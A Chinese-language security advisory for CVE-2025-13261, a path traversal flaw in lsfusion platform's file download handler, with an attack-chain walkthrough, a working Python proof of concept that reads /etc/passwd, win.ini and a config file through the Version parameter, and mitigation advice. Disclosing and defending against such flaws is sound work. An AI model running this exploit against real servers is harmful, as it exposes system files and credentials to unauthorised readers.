CVE-2025-13261: lsfusion platform DownloadFileRequestHandler路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-13261

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

lsfusion platform

漏洞概述

CVE-2025-13261是lsfusion platform中的一个中等严重性路径遍历漏洞。该漏洞存在于web-client组件的文件下载处理功能中，攻击者可以通过操纵Version参数实现目录遍历，从而访问服务器上的任意文件。由于该漏洞的利用代码已公开，且无需认证即可远程利用，对使用受影响版本lsfusion platform的组织构成安全威胁。攻击者可能利用此漏洞读取敏感配置文件、凭据文件或其他系统文件，可能导致信息泄露。CVSS 3.1评分5.3表明该漏洞通过网络即可利用，但造成的机密性影响较低，完整性和可用性不受影响。建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞位于lsfusion platform的web-client模块中，具体在DownloadFileRequestHandler类中。漏洞根源在于程序对用户输入的Version参数缺乏充分的输入验证。当处理文件下载请求时，应用程序直接使用传入的Version参数构造文件路径，而未对路径中的特殊字符（如../）进行过滤或规范化。攻击者可以通过构造包含路径遍历序列的Version参数值，如../../../etc/passwd或../../../../windows/system32/config/sam，诱使应用程序读取服务器文件系统中的任意文件。由于该接口设计为处理文件下载请求，攻击者可以获取返回的文件内容。此漏洞影响lsfusion platform 6.1及之前的所有版本，攻击复杂度低，无需认证或用户交互即可实现远程利用。

攻击链分析

STEP 1

步骤1

攻击者识别目标lsfusion platform服务器，确认其运行版本在6.1或更早版本

STEP 2

步骤2

攻击者访问/web-client/file/download端点，该端点由DownloadFileRequestHandler处理

STEP 3

步骤3

攻击者构造包含路径遍历序列（如../）的Version参数，例如../../../etc/passwd

STEP 4

步骤4

服务器端代码将恶意构造的Version参数直接用于文件路径构造，未进行安全验证

STEP 5

步骤5

应用程序读取攻击者指定的任意文件，并通过HTTP响应返回文件内容

STEP 6

步骤6

攻击者获取敏感文件内容，可能包括配置文件、凭据、密钥等信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13261 Path Traversal PoC for lsfusion platform
# Target: lsfusion platform DownloadFileRequestHandler

def exploit_cve_2025_13261(target_url, file_path):
    """
    Exploit path traversal in DownloadFileRequestHandler
    Args:
        target_url: Base URL of lsfusion platform
        file_path: Target file to read (e.g., ../../../../etc/passwd)
    """
    # Construct path traversal payload
    # The Version parameter is vulnerable to path traversal
    params = {
        'Version': file_path  # Path traversal payload
    }
    
    # Target endpoint for file download
    endpoint = f"{target_url}/web-client/file/download"
    
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Successfully retrieved file: {file_path}")
            print(f"[+] Content:\n{response.text[:500]}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None

# Example usage
if __name__ == "__main__":
    target = "http://target-lsfusion-server:8080"
    # Read sensitive files
    files_to_read = [
        "../../../../etc/passwd",
        "../../../../windows/win.ini",
        "../../../lsfusion/config/application.properties"
    ]
    for file_path in files_to_read:
        exploit_cve_2025_13261(target, file_path)

影响范围

lsfusion platform <= 6.1

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1) 在Web应用防火墙（WAF）中添加规则，阻止包含路径遍历序列（../、..\、%2e%2e等）的请求；2) 限制文件下载功能的网络访问，仅允许受信任的IP段访问；3) 监控Web服务器的访问日志，及时发现和阻止异常的文件访问请求；4) 避免在lsfusion平台服务器上存储敏感配置文件，或对敏感文件设置严格的文件系统权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13261
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13261
3 Details https://www.cvedetails.com/cve/CVE-2025-13261/
4 VulDB https://vuldb.com/cve/CVE-2025-13261
5 Link https://github.com/lsfusion/platform/issues/1543
6 Link https://github.com/lsfusion/platform/issues/1543#issue-3576922131
7 Link https://vuldb.com/?ctiid.332596
8 Link https://vuldb.com/?id.332596
9 Link https://vuldb.com/?submit.689412